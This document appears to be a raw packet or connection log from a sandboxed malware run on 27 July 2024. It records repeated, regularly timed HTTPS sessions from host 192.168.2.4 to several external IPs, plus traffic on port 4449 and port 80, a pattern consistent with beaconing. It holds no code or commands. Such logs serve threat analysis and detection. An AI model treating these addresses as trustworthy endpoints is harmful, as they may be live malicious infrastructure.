Jul 27, 2024 07:45:16.273245096 CEST	62336	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:45:16.273325920 CEST	443	62336	172.67.213.85	192.168.2.4
Jul 27, 2024 07:45:16.273494959 CEST	62336	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:45:16.274545908 CEST	62336	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:45:16.274583101 CEST	443	62336	172.67.213.85	192.168.2.4
Jul 27, 2024 07:45:16.719449043 CEST	443	62335	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:16.719541073 CEST	443	62335	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:16.719721079 CEST	62335	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:16.740304947 CEST	443	62336	172.67.213.85	192.168.2.4
Jul 27, 2024 07:45:16.740499020 CEST	62336	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:45:16.750390053 CEST	62335	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:16.750391006 CEST	62335	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:16.750454903 CEST	443	62335	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:16.750490904 CEST	443	62335	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:16.865302086 CEST	62337	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:16.865381956 CEST	443	62337	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:16.865510941 CEST	62337	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:16.865874052 CEST	62337	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:16.865901947 CEST	443	62337	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:17.008992910 CEST	62336	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:45:17.494704962 CEST	443	62337	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:17.494941950 CEST	62337	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:17.497334957 CEST	62337	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:17.497386932 CEST	443	62337	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:17.497459888 CEST	62337	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:17.497472048 CEST	443	62337	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:17.497746944 CEST	443	62337	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:17.497906923 CEST	62337	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:17.540538073 CEST	443	62337	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:18.826651096 CEST	443	62337	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:18.826833963 CEST	443	62337	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:18.826905012 CEST	62337	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:18.842431068 CEST	62337	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:18.842483044 CEST	443	62337	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:18.842514038 CEST	62337	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:18.842529058 CEST	443	62337	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:18.945787907 CEST	62339	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:18.945866108 CEST	443	62339	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:18.946114063 CEST	62339	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:18.948971987 CEST	62339	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:18.949052095 CEST	443	62339	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:19.548568964 CEST	443	62339	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:19.548661947 CEST	62339	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:19.550875902 CEST	62339	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:19.550906897 CEST	443	62339	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:19.550962925 CEST	62339	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:19.550973892 CEST	443	62339	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:19.551703930 CEST	443	62339	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:19.551832914 CEST	62339	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:19.592539072 CEST	443	62339	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:20.891618967 CEST	443	62339	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:20.891804934 CEST	443	62339	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:20.891988993 CEST	62339	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:20.905772924 CEST	62339	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:20.905772924 CEST	62339	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:20.905838966 CEST	443	62339	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:20.905877113 CEST	443	62339	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:21.021348000 CEST	62340	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:21.021380901 CEST	443	62340	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:21.021451950 CEST	62340	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:21.021871090 CEST	62340	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:21.021879911 CEST	443	62340	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:21.716396093 CEST	443	62340	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:21.716533899 CEST	62340	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:21.718732119 CEST	62340	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:21.718740940 CEST	443	62340	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:21.718782902 CEST	62340	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:21.718786955 CEST	443	62340	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:21.718858004 CEST	62340	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:21.718862057 CEST	443	62340	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:21.719064951 CEST	443	62340	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:21.719182014 CEST	62340	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:21.744076014 CEST	4449	62319	94.156.79.190	192.168.2.4
Jul 27, 2024 07:45:21.744240999 CEST	62319	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 07:45:21.760499954 CEST	443	62340	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:23.458184004 CEST	443	62340	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:23.458384991 CEST	443	62340	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:23.458460093 CEST	62340	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:23.473447084 CEST	62340	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:23.473464966 CEST	443	62340	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:23.473489046 CEST	62340	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:23.473495007 CEST	443	62340	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:23.586658001 CEST	62341	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:23.586733103 CEST	443	62341	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:23.586802959 CEST	62341	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:23.587172985 CEST	62341	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:23.587199926 CEST	443	62341	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:24.424038887 CEST	443	62341	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:24.424232960 CEST	62341	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:24.426286936 CEST	62341	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:24.426315069 CEST	443	62341	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:24.426368952 CEST	62341	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:24.426381111 CEST	443	62341	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:24.426662922 CEST	443	62341	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:24.426810980 CEST	62341	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:24.472570896 CEST	443	62341	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:24.846544027 CEST	62319	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 07:45:24.847548008 CEST	62342	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:45:24.851943970 CEST	4449	62319	94.156.79.190	192.168.2.4
Jul 27, 2024 07:45:24.852844000 CEST	4449	62342	193.222.96.24	192.168.2.4
Jul 27, 2024 07:45:24.852916002 CEST	62342	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:45:24.853161097 CEST	62342	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:45:24.858580112 CEST	4449	62342	193.222.96.24	192.168.2.4
Jul 27, 2024 07:45:25.776556969 CEST	443	62341	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:25.776736021 CEST	443	62341	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:25.776926041 CEST	62341	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:25.790941954 CEST	62341	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:25.790993929 CEST	443	62341	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:25.791023970 CEST	62341	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:25.791039944 CEST	443	62341	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:25.899179935 CEST	62343	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:25.899281979 CEST	443	62343	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:25.899367094 CEST	62343	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:25.899738073 CEST	62343	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:25.899774075 CEST	443	62343	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:26.513290882 CEST	443	62343	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:26.513385057 CEST	62343	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:26.515819073 CEST	62343	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:26.515849113 CEST	443	62343	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:26.515904903 CEST	62343	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:26.515916109 CEST	443	62343	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:26.515969038 CEST	62343	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:26.515978098 CEST	443	62343	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:26.516541958 CEST	443	62343	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:26.516685963 CEST	62343	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:26.516714096 CEST	443	62343	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:27.744235992 CEST	443	62343	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:27.744422913 CEST	443	62343	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:27.744518995 CEST	62343	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:27.758162022 CEST	62343	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:27.758162022 CEST	62343	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:27.758217096 CEST	443	62343	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:27.758245945 CEST	443	62343	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:27.867495060 CEST	62344	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:27.867537975 CEST	443	62344	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:27.867613077 CEST	62344	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:27.868014097 CEST	62344	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:27.868026972 CEST	443	62344	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:28.535475969 CEST	443	62344	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:28.535656929 CEST	62344	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:28.537724018 CEST	62344	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:28.537730932 CEST	443	62344	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:28.537786007 CEST	62344	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:28.537789106 CEST	443	62344	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:28.537823915 CEST	62344	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:28.537827015 CEST	443	62344	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:28.537931919 CEST	443	62344	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:28.538033009 CEST	62344	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:28.580544949 CEST	443	62344	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:29.533149004 CEST	443	62344	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:29.533219099 CEST	443	62344	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:29.533262968 CEST	62344	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:29.547605991 CEST	62344	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:29.547622919 CEST	443	62344	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:29.547635078 CEST	62344	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:29.547638893 CEST	443	62344	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:29.648468971 CEST	62345	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:29.648546934 CEST	443	62345	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:29.648617029 CEST	62345	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:29.648947954 CEST	62345	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:29.648981094 CEST	443	62345	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:30.253846884 CEST	443	62345	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:30.253941059 CEST	62345	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:30.256115913 CEST	62345	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:30.256139040 CEST	443	62345	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:30.256211042 CEST	62345	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:30.256221056 CEST	443	62345	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:30.256359100 CEST	443	62345	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:30.256472111 CEST	62345	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:30.300510883 CEST	443	62345	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:31.558406115 CEST	443	62345	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:31.558471918 CEST	443	62345	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:31.558538914 CEST	62345	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:31.573297024 CEST	62345	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:31.573350906 CEST	443	62345	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:31.573381901 CEST	62345	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:31.573399067 CEST	443	62345	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:31.679671049 CEST	62346	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:31.679753065 CEST	443	62346	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:31.679826021 CEST	62346	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:31.680191040 CEST	62346	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:31.680228949 CEST	443	62346	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:32.287992954 CEST	443	62346	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:32.288085938 CEST	62346	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:32.290242910 CEST	62346	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:32.290271997 CEST	443	62346	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:32.290344954 CEST	62346	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:32.290358067 CEST	443	62346	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:32.290504932 CEST	443	62346	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:32.290615082 CEST	62346	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:32.336534977 CEST	443	62346	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:33.326456070 CEST	62347	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:45:33.488300085 CEST	80	62347	186.145.236.93	192.168.2.4
Jul 27, 2024 07:45:33.488466024 CEST	62347	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:45:33.488702059 CEST	62347	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:45:33.488702059 CEST	62347	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:45:33.493546009 CEST	80	62347	186.145.236.93	192.168.2.4
Jul 27, 2024 07:45:33.493926048 CEST	80	62347	186.145.236.93	192.168.2.4
Jul 27, 2024 07:45:33.632369041 CEST	443	62346	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:33.632447958 CEST	443	62346	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:33.632643938 CEST	62346	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:33.646480083 CEST	62346	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:33.646481037 CEST	62346	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:33.646547079 CEST	443	62346	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:33.646583080 CEST	443	62346	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:33.757930040 CEST	62348	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:33.757970095 CEST	443	62348	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:33.758210897 CEST	62348	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:33.758439064 CEST	62348	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:33.758454084 CEST	443	62348	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:34.419380903 CEST	443	62348	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:34.419630051 CEST	62348	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:34.421823025 CEST	62348	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:34.421828985 CEST	443	62348	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:34.421880960 CEST	62348	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:34.421885014 CEST	443	62348	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:34.421927929 CEST	62348	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:34.421930075 CEST	443	62348	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:34.422038078 CEST	443	62348	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:34.422151089 CEST	62348	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:34.464540005 CEST	443	62348	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:34.541039944 CEST	80	62347	186.145.236.93	192.168.2.4
Jul 27, 2024 07:45:34.541397095 CEST	80	62347	186.145.236.93	192.168.2.4
Jul 27, 2024 07:45:34.541448116 CEST	62347	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:45:34.541492939 CEST	62347	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:45:34.550844908 CEST	80	62347	186.145.236.93	192.168.2.4
Jul 27, 2024 07:45:35.512402058 CEST	443	62348	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:35.512459993 CEST	443	62348	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:35.512502909 CEST	62348	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:35.526711941 CEST	62348	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:35.526735067 CEST	443	62348	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:35.526748896 CEST	62348	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:35.526755095 CEST	443	62348	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:35.632770061 CEST	62349	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:35.632848978 CEST	443	62349	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:35.632942915 CEST	62349	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:35.633353949 CEST	62349	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:35.633389950 CEST	443	62349	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:36.223321915 CEST	443	62349	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:36.223496914 CEST	62349	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:36.226097107 CEST	62349	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:36.226126909 CEST	443	62349	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:36.226186991 CEST	62349	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:36.226198912 CEST	443	62349	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:36.226367950 CEST	443	62349	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:36.226494074 CEST	62349	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:36.268580914 CEST	443	62349	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:37.564843893 CEST	443	62349	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:37.564905882 CEST	443	62349	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:37.564970970 CEST	62349	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:37.578954935 CEST	62349	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:37.579022884 CEST	443	62349	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:37.579061985 CEST	62349	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:37.579081059 CEST	443	62349	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:37.679955006 CEST	62350	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:37.680056095 CEST	443	62350	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:37.680150032 CEST	62350	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:37.680578947 CEST	62350	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:37.680617094 CEST	443	62350	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:38.313278913 CEST	443	62350	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:38.313400030 CEST	62350	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:38.315825939 CEST	62350	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:38.315854073 CEST	443	62350	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:38.315928936 CEST	62350	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:38.315939903 CEST	443	62350	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:38.316207886 CEST	443	62350	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:38.316365957 CEST	62350	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:38.316395044 CEST	443	62350	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:39.589706898 CEST	443	62350	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:39.589796066 CEST	443	62350	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:39.589860916 CEST	62350	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:39.605042934 CEST	62350	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:39.605088949 CEST	443	62350	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:39.605114937 CEST	62350	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:39.605134010 CEST	443	62350	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:39.711000919 CEST	62351	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:39.711033106 CEST	443	62351	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:39.711087942 CEST	62351	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:39.711462021 CEST	62351	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:39.711477041 CEST	443	62351	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:40.390139103 CEST	443	62351	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:40.390221119 CEST	62351	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:40.392388105 CEST	62351	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:40.392396927 CEST	443	62351	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:40.392446041 CEST	62351	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:40.392460108 CEST	443	62351	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:40.392503977 CEST	62351	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:40.392508984 CEST	443	62351	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:40.393222094 CEST	443	62351	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:40.393338919 CEST	62351	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:40.436517954 CEST	443	62351	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:41.381717920 CEST	443	62351	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:41.381834984 CEST	443	62351	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:41.381900072 CEST	62351	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:41.428495884 CEST	62351	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:41.428517103 CEST	443	62351	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:41.428551912 CEST	62351	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:41.428556919 CEST	443	62351	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:41.545305967 CEST	62352	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:41.545387030 CEST	443	62352	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:41.545496941 CEST	62352	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:41.545866966 CEST	62352	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:41.545906067 CEST	443	62352	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:42.642465115 CEST	443	62352	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:42.642579079 CEST	62352	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:42.645169020 CEST	62352	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:42.645222902 CEST	443	62352	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:42.645298958 CEST	62352	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:42.645313025 CEST	443	62352	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:42.646048069 CEST	443	62352	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:42.646322012 CEST	62352	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:42.688570976 CEST	443	62352	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:42.898921013 CEST	62353	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:45:42.906075001 CEST	80	62353	186.145.236.93	192.168.2.4
Jul 27, 2024 07:45:42.906168938 CEST	62353	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:45:42.906269073 CEST	62353	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:45:42.906302929 CEST	62353	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:45:42.911273003 CEST	80	62353	186.145.236.93	192.168.2.4
Jul 27, 2024 07:45:42.911559105 CEST	80	62353	186.145.236.93	192.168.2.4
Jul 27, 2024 07:45:43.962272882 CEST	80	62353	186.145.236.93	192.168.2.4
Jul 27, 2024 07:45:43.962321997 CEST	80	62353	186.145.236.93	192.168.2.4
Jul 27, 2024 07:45:43.962407112 CEST	62353	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:45:43.962604046 CEST	62353	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:45:43.967684031 CEST	80	62353	186.145.236.93	192.168.2.4
Jul 27, 2024 07:45:44.041439056 CEST	443	62352	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:44.041621923 CEST	443	62352	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:44.041810989 CEST	62352	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:44.055697918 CEST	62352	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:44.055758953 CEST	443	62352	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:44.055790901 CEST	62352	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:44.055809021 CEST	443	62352	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:44.163980007 CEST	62354	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:44.164050102 CEST	443	62354	107.173.160.139	192.168.2.4
